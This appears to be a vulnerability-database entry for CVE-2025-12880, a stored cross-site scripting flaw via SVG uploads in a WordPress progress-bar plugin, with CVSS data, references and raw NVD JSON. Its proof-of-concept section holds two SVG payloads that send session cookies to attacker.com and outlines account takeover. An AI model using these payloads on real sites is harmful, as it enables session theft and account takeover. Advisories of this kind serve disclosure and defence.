CVE-2025-12880

Description

The Progress Bar Blocks for Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Progress Bar Blocks for Gutenberg <= 1.0.0 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- Malicious SVG file content for CVE-2025-12880 -->
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <script>document.location='https://attacker.com/steal?cookie='+encodeURIComponent(document.cookie)</script>
</svg>

<!-- PoC Explanation: -->
<!-- 1. Create an SVG file with malicious JavaScript code -->
<!-- 2. Upload the SVG file through the vulnerable plugin's upload function -->
<!-- 3. When other users access the uploaded SVG file, the script executes -->
<!-- 4. Attacker can steal session cookies and perform account takeover -->

<!-- Alternative PoC using event handlers: -->
<svg xmlns="http://www.w3.org/2000/svg">
  <rect width="100%" height="100%" fill="red" onload="fetch('https://attacker.com/log?data='+document.cookie)"/>
</svg>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12880
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12880
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12880/
[4] VulDB https://vuldb.com/cve/CVE-2025-12880
[5] https://wordpress.org/plugins/progressmatify-blocks/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/3bc48d4d-eeee-47f7-be5e-0d6a43473aa0?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12880", "sourceIdentifier": "[email protected]", "published": "2025-11-11T04:15:50.580", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Progress Bar Blocks for Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://wordpress.org/plugins/progressmatify-blocks/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3bc48d4d-eeee-47f7-be5e-0d6a43473aa0?source=cve", "source": "[email protected]"}]}}